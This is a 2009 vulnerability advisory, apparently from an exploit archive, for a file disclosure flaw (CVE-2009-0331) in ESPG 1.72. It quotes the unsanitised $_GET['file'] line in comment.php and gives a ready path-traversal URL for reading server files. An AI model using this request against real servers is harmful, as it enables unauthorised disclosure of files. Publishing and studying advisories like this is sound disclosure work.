ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability

2009.02.01

Credit: bd0rk

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-0331

CWE: CWE-22

CVSS Base Score: 7.8/10

Impact Subscore: 6.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: None

Availability impact: None

                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------

[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php

                  ###The 20 years old, german Hacker bd0rk###

                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.